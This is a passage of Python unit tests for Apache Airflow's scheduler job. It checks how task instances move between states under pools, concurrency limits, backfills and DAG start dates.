ti1.refresh_from_db()
self.assertEquals(State.SCHEDULED, ti1.state)
def test_execute_task_instances_no_dagrun_task_will_execute(self):
"""
Tests that tasks without dagrun still get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_no_dagrun_task_will_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
ti1.execution_date = ti1.execution_date + datetime.timedelta(days=1)
session.merge(ti1)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEquals(State.QUEUED, ti1.state)
def test_execute_task_instances_backfill_tasks_wont_execute(self):
"""
Tests that backfill tasks won't get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_backfill_tasks_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.run_id = BackfillJob.ID_PREFIX + '_blah'
ti1 = TI(task1, dr1.execution_date)
ti1.refresh_from_db()
ti1.state = State.SCHEDULED
session.merge(ti1)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEquals(State.SCHEDULED, ti1.state)
def test_find_executable_task_instances_backfill_nodagrun(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_backfill_nodagrun'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr2.run_id = BackfillJob.ID_PREFIX + 'asdf'
ti_no_dagrun = TI(task1, DEFAULT_DATE - datetime.timedelta(days=1))
ti_backfill = TI(task1, dr2.execution_date)
ti_with_dagrun = TI(task1, dr1.execution_date)
# ti_with_paused
ti_no_dagrun.state = State.SCHEDULED
ti_backfill.state = State.SCHEDULED
ti_with_dagrun.state = State.SCHEDULED
session.merge(dr2)
session.merge(ti_no_dagrun)
session.merge(ti_backfill)
session.merge(ti_with_dagrun)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti_no_dagrun.key, res_keys)
self.assertIn(ti_with_dagrun.key, res_keys)
def test_find_executable_task_instances_pool(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_pool'
task_id_1 = 'dummy'
task_id_2 = 'dummydummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, pool='a')
task2 = DummyOperator(dag=dag, task_id=task_id_2, pool='b')
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
tis = ([
TI(task1, dr1.execution_date),
TI(task2, dr1.execution_date),
TI(task1, dr2.execution_date),
TI(task2, dr2.execution_date)
])
for ti in tis:
ti.state = State.SCHEDULED
session.merge(ti)
pool = models.Pool(pool='a', slots=1, description='haha')
pool2 = models.Pool(pool='b', slots=100, description='haha')
session.add(pool)
session.add(pool2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
session.commit()
self.assertEqual(3, len(res))
res_keys = []
for ti in res:
res_keys.append(ti.key)
self.assertIn(tis[0].key, res_keys)
self.assertIn(tis[1].key, res_keys)
self.assertIn(tis[3].key, res_keys)
def test_nonexistent_pool(self):
dag_id = 'SchedulerJobTest.test_nonexistent_pool'
task_id = 'dummy_wrong_pool'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task = DummyOperator(dag=dag, task_id=task_id, pool="this_pool_doesnt_exist")
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr = scheduler.create_dag_run(dag)
ti = TI(task, dr.execution_date)
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
session.commit()
self.assertEqual(0, len(res))
def test_find_executable_task_instances_none(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_none'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
scheduler.create_dag_run(dag)
session.commit()
self.assertEqual(0, len(scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)))
def test_find_executable_task_instances_concurrency(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.RUNNING
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti2.key, res_keys)
ti2.state = State.RUNNING
session.merge(ti2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
def test_find_executable_task_instances_concurrency_queued(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency_queued'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
task1 = DummyOperator(dag=dag, task_id='dummy1')
task2 = DummyOperator(dag=dag, task_id='dummy2')
task3 = DummyOperator(dag=dag, task_id='dummy3')
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dag_run = scheduler.create_dag_run(dag)
ti1 = TI(task1, dag_run.execution_date)
ti2 = TI(task2, dag_run.execution_date)
ti3 = TI(task3, dag_run.execution_date)
ti1.state = State.RUNNING
ti2.state = State.QUEUED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
self.assertEqual(res[0].key, ti3.key)
def test_find_executable_task_instances_task_concurrency(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_task_concurrency'
task_id_1 = 'dummy'
task_id_2 = 'dummy2'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, task_concurrency=2)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1_1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1_1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti2.state = State.RUNNING
ti1_2 = TI(task1, dr2.execution_date)
ti1_2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.merge(ti1_2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
ti1_2.state = State.RUNNING
ti1_3 = TI(task1, dr3.execution_date)
ti1_3.state = State.SCHEDULED
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
ti1_1.state = State.SCHEDULED
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
def test_change_state_for_executable_task_instances_no_tis(self):
scheduler = SchedulerJob()
session = settings.Session()
res = scheduler._change_state_for_executable_task_instances(
[], [State.NONE], session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_no_tis_with_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__no_tis_with_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.RUNNING],
session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_none_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__none_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.QUEUED
ti3.state = State.NONE
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.NONE, State.SCHEDULED],
session)
self.assertEqual(2, len(res))
ti1.refresh_from_db()
ti3.refresh_from_db()
self.assertEqual(State.QUEUED, ti1.state)
self.assertEqual(State.QUEUED, ti3.state)
def test_enqueue_task_instances_with_queued_state(self):
dag_id = 'SchedulerJobTest.test_enqueue_task_instances_with_queued_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
session.merge(ti1)
session.commit()
with patch.object(BaseExecutor, 'queue_command') as mock_queue_command:
scheduler._enqueue_task_instances_with_queued_state(dagbag, [ti1])
mock_queue_command.assert_called()
def test_execute_task_instances_nothing(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_nothing'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = SimpleDagBag([])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti1.state = State.SCHEDULED
session.merge(ti1)
session.commit()
self.assertEqual(0, scheduler._execute_task_instances(dagbag, states=[State.SCHEDULED]))
def test_execute_task_instances(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_nonexistent_queue'
# important that len(tasks) is less than concurrency
# because before scheduler._execute_task_instances would only
# check the num tasks once so if concurrency was 3,
# we could execute arbitrarily many tasks in the second run
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
# create first dag run with 1 running and 1 queued
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.RUNNING
ti2.state = State.RUNNING
session.merge(ti1)
session.merge(ti2)
session.commit()
self.assertEqual(State.RUNNING, dr1.state)
self.assertEqual(
2,
DAG.get_num_task_instances(
dag_id, dag.task_ids, states=[State.RUNNING], session=session
)
)
# create second dag run
dr2 = scheduler.create_dag_run(dag)
ti3 = TI(task1, dr2.execution_date)
ti4 = TI(task2, dr2.execution_date)
ti3.refresh_from_db()
ti4.refresh_from_db()
# manually set to scheduled so we can pick them up
ti3.state = State.SCHEDULED
ti4.state = State.SCHEDULED
session.merge(ti3)
session.merge(ti4)
session.commit()
self.assertEqual(State.RUNNING, dr2.state)
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
# check that concurrency is respected
ti1.refresh_from_db()
ti2.refresh_from_db()
ti3.refresh_from_db()
ti4.refresh_from_db()
self.assertEqual(
3,
DAG.get_num_task_instances(
dag_id, dag.task_ids, states=[State.RUNNING, State.QUEUED], session=session
)
)
self.assertEqual(State.RUNNING, ti1.state)
self.assertEqual(State.RUNNING, ti2.state)
six.assertCountEqual(self, [State.QUEUED, State.SCHEDULED], [ti3.state, ti4.state])
self.assertEqual(1, res)
def test_execute_task_instances_limit(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_limit'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_2'
# important that len(tasks) is less than concurrency
# because before scheduler._execute_task_instances would only
# check the num tasks once so if concurrency was 3,
# we could execute arbitrarily many tasks in the second run
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
scheduler.max_tis_per_query = 3
session = settings.Session()
tis = []
for i in range(0, 4):
dr = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr.execution_date)
ti2 = TI(task2, dr.execution_date)
tis.append(ti1)
tis.append(ti2)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.commit()
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
self.assertEqual(8, res)
for ti in tis:
ti.refresh_from_db()
self.assertEqual(State.QUEUED, ti.state)
@unittest.skipUnless("INTEGRATION" in os.environ,
"The test is flaky with nondeterministic result")
def test_change_state_for_tis_without_dagrun(self):
dag1 = DAG(dag_id='test_change_state_for_tis_without_dagrun', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag1, owner='airflow')
DummyOperator(task_id='dummy_b', dag=dag1, owner='airflow')
dag2 = DAG(dag_id='test_change_state_for_tis_without_dagrun_dont_change', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag2, owner='airflow')
dag3 = DAG(dag_id='test_change_state_for_tis_without_dagrun_no_dagrun', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag3, owner='airflow')
session = settings.Session()
dr1 = dag1.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag2.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti1a = dr1.get_task_instance(task_id='dummy', session=session)
ti1a.state = State.SCHEDULED
ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
ti1b.state = State.SUCCESS
session.commit()
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.state = State.SCHEDULED
session.commit()
ti3 = TI(dag3.get_task('dummy'), DEFAULT_DATE)
ti3.state = State.SCHEDULED
session.merge(ti3)
session.commit()
dagbag = self._make_simple_dag_bag([dag1, dag2, dag3])
scheduler = SchedulerJob(num_runs=0, run_duration=0)
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti1a = dr1.get_task_instance(task_id='dummy', session=session)
ti1a.refresh_from_db(session=session)
self.assertEqual(ti1a.state, State.SCHEDULED)
ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
ti1b.refresh_from_db(session=session)
self.assertEqual(ti1b.state, State.SUCCESS)
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
ti3.refresh_from_db(session=session)
self.assertEquals(ti3.state, State.NONE)
dr1.refresh_from_db(session=session)
dr1.state = State.FAILED
# why o why
session.merge(dr1)
session.commit()
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti1a.refresh_from_db(session=session)
self.assertEqual(ti1a.state, State.SCHEDULED)
# don't touch ti1b
ti1b.refresh_from_db(session=session)
self.assertEqual(ti1b.state, State.SUCCESS)
# don't touch ti2
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
def test_change_state_for_tasks_failed_to_execute(self):
dag = DAG(
dag_id='dag_id',
start_date=DEFAULT_DATE)
task = DummyOperator(
task_id='task_id',
dag=dag,
owner='airflow')
# If there's no left over task in executor.queued_tasks, nothing happens
session = settings.Session()
scheduler_job = SchedulerJob()
mock_logger = mock.MagicMock()
test_executor = TestExecutor()
scheduler_job.executor = test_executor
scheduler_job._logger = mock_logger
scheduler_job._change_state_for_tasks_failed_to_execute()
mock_logger.info.assert_not_called()
# Tasks failed to execute with QUEUED state will be set to SCHEDULED state.
session.query(TI).delete()
session.commit()
key = 'dag_id', 'task_id', DEFAULT_DATE, 1
test_executor.queued_tasks[key] = 'value'
ti = TI(task, DEFAULT_DATE)
ti.state = State.QUEUED
session.merge(ti)
session.commit()
scheduler_job._change_state_for_tasks_failed_to_execute()
ti.refresh_from_db()
self.assertEquals(State.SCHEDULED, ti.state)
# Tasks failed to execute with RUNNING state will not be set to SCHEDULED state.
session.query(TI).delete()
session.commit()
ti.state = State.RUNNING
session.merge(ti)
session.commit()
scheduler_job._change_state_for_tasks_failed_to_execute()
ti.refresh_from_db()
self.assertEquals(State.RUNNING, ti.state)
def test_execute_helper_reset_orphaned_tasks(self):
session = settings.Session()
dag = DAG(
'test_execute_helper_reset_orphaned_tasks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag.create_dagrun(run_id=BackfillJob.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(1),
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.SCHEDULED
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
ti2.state = State.SCHEDULED
session.commit()
processor = mock.MagicMock()
scheduler = SchedulerJob(num_runs=0, run_duration=0)
executor = TestExecutor()
scheduler.executor = executor
scheduler.processor_agent = processor
scheduler._execute_helper()
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti.state, State.NONE)
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
@provide_session
def evaluate_dagrun(
self,
dag_id,
expected_task_states, # dict of task_id: state
dagrun_state,
run_kwargs=None,
advance_execution_date=False,
session=None):
"""
Helper for testing DagRun states with simple two-task DAGS.
This is hackish: a dag run is created but its tasks are
run by a backfill.
"""
if run_kwargs is None:
run_kwargs = {}
scheduler = SchedulerJob()
dag = self.dagbag.get_dag(dag_id)
dag.clear()
dr = scheduler.create_dag_run(dag)
if advance_execution_date:
# run a second time to schedule a dagrun after the start_date
dr = scheduler.create_dag_run(dag)
ex_date = dr.execution_date
try:
dag.run(start_date=ex_date, end_date=ex_date, **run_kwargs)
except AirflowException:
pass
# test tasks
for task_id, expected_state in expected_task_states.items():
task = dag.get_task(task_id)
ti = TI(task, ex_date)
ti.refresh_from_db()
self.assertEqual(ti.state, expected_state)
# load dagrun
dr = DagRun.find(dag_id=dag_id, execution_date=ex_date)
dr = dr[0]
dr.dag = dag
self.assertEqual(dr.state, dagrun_state)
def test_dagrun_fail(self):
"""
DagRuns with one failed and one incomplete root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_fail',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.UPSTREAM_FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_success(self):
"""
DagRuns with one failed and one successful root task -> SUCCESS
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_success',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.SUCCESS,
},
dagrun_state=State.SUCCESS)
def test_dagrun_root_fail(self):
"""
DagRuns with one successful and one failed root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_root_fail',
expected_task_states={
'test_dagrun_succeed': State.SUCCESS,
'test_dagrun_fail': State.FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_root_fail_unfinished(self):
"""
DagRuns with one unfinished and one failed root task -> RUNNING
"""
# Run both the failed and successful tasks
scheduler = SchedulerJob()
dag_id = 'test_dagrun_states_root_fail_unfinished'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
dr = scheduler.create_dag_run(dag)
try:
dag.run(start_date=dr.execution_date, end_date=dr.execution_date)
except AirflowException: # Expect an exception since there is a failed task
pass
# Mark the successful task as never having run since we want to see if the
# dagrun will be in a running state despite haveing an unfinished task.
with create_session() as session:
ti = dr.get_task_instance('test_dagrun_unfinished', session=session)
ti.state = State.NONE
session.commit()
dr_state = dr.update_state()
self.assertEqual(dr_state, State.RUNNING)
def test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date(self):
"""
DagRun is marked a success if ignore_first_depends_on_past=True
Test that an otherwise-deadlocked dagrun is marked as a success
if ignore_first_depends_on_past=True and the dagrun execution_date
is after the start_date.
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
advance_execution_date=True,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_dagrun_deadlock_ignore_depends_on_past(self):
"""
Test that ignore_first_depends_on_past doesn't affect results
(this is the same test as
test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date except
that start_date == execution_date so depends_on_past is irrelevant).
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_scheduler_start_date(self):
"""
Test that the scheduler respects start_dates, even when DAGS have run
"""
with create_session() as session:
dag_id = 'test_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertTrue(dag.start_date > datetime.datetime.utcnow())
scheduler = SchedulerJob(dag_id,
num_runs=2)
scheduler.run()
# zero tasks ran
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
session.commit()
# previously, running this backfill would kick off the Scheduler
# because it would take the most recent run and start from there
# That behavior still exists, but now it will only do so if after the
# start date
backfill = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
backfill.run()
# one task ran
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
session.commit()
scheduler = SchedulerJob(dag_id,
num_runs=2)
scheduler.run()
# still one task
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
session.commit()
def test_scheduler_task_start_date(self):
"""
Test that the scheduler respects task start dates that are different
from DAG start dates
"""
dag_id = 'test_task_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_id,
num_runs=2)
scheduler.run()
session = settings.Session()
tiq = session.query(TI).filter(TI.dag_id == dag_id)
ti1s = tiq.filter(TI.task_id == 'dummy1').all()
ti2s = tiq.filter(TI.task_id == 'dummy2').all()
self.assertEqual(len(ti1s), 0)
self.assertEqual(len(ti2s), 2)
for t in ti2s:
self.assertEqual(t.state, State.SUCCESS)
def test_scheduler_multiprocessing(self):
"""
Test that the scheduler can successfully queue multiple dags in parallel
"""
dag_ids = ['test_start_date_scheduling', 'test_dagrun_states_success']
for dag_id in dag_ids:
dag = self.dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
num_runs=2)
scheduler.run()
# zero tasks ran
dag_id = 'test_start_date_scheduling'
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
def test_scheduler_dagrun_once(self):
"""
Test if the scheduler does not create multiple dagruns
if a dag is scheduled with @once and a start_date
"""
dag = DAG(
'test_scheduler_dagrun_once',
start_date=timezone.datetime(2015, 1, 1),
schedule_interval="@once")
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
def test_scheduler_process_task_instances(self):
"""
Test if _process_task_instances puts the right task instances into the
queue.
"""
dag = DAG(
dag_id='test_scheduler_process_execute_task',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE, TRY_NUMBER)
)
def test_scheduler_do_not_schedule_removed_task(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_do_not_schedule_too_early(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_too_early',
start_date=timezone.datetime(2200, 1, 1))
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_do_not_run_finished(self):
dag = DAG(
dag_id='test_scheduler_do_not_run_finished',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances(session=session)
for ti in tis:
ti.state = State.SUCCESS
session.commit()
session.close()
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_add_new_task(self):
"""
Test if a task instance will be added if the dag is updated
"""
dag = DAG(
dag_id='test_scheduler_add_new_task',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
